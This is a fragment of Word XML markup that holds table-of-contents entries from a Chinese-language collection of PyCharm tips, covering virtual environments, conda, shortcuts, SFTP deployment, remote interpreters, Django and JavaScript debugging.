        <w:p w14:paraId="7DA9E810" w14:textId="1742F2D3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780249" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pycharm</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>技巧</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780249 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>873</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A38B67A" w14:textId="778D8AFE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780250" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>破解版安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780250 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>873</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CBD7282" w14:textId="44BAEA52" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780251" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解释器和虚拟环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780251 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>873</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ADEDFBC" w14:textId="515179E3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780252" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>虚拟解释器和机器系统的解释器不同，包环境不同</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780252 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>873</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="133A088A" w14:textId="2E16F509" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780253" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pycharm</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>手动安装包环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780253 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>874</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3466566C" w14:textId="06BF5F6B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780254" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>成功解决虚拟环境运行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>项目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780254 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>875</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="550E413A" w14:textId="638D0A68" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780255" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>结合</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建新版本的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解释器并配置到</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pycharm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780255 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>875</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EE93FAA" w14:textId="63AFAAF2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780256" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常用快捷键</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780256 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>877</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="753C1E51" w14:textId="136BDD8D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780257" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>增加</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SFTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>部署</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780257 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>878</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E640728" w14:textId="7ABA4A00" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780258" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>函数文档</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780258 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>878</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E735B93" w14:textId="461B156C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780259" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>实际示例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780259 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>879</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A8D12A3" w14:textId="0F24C8FD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780260" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>正确的增加远程</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解释器</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780260 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>880</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0110B0FD" w14:textId="03F10062" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780261" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>坑点：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Pycharm:Can't get remote credentials for deployment server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780261 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>882</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78628F1B" w14:textId="75D8F771" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780262" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>将项目启用为</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>支持</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780262 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>882</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7818FDA9" w14:textId="4815B508" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780263" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>调试</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>JS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>javascript</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nodejs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780263 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>883</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71C835B3" w14:textId="3DD9550E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780264" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VUE</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（鸡肋，不如</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vscode</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
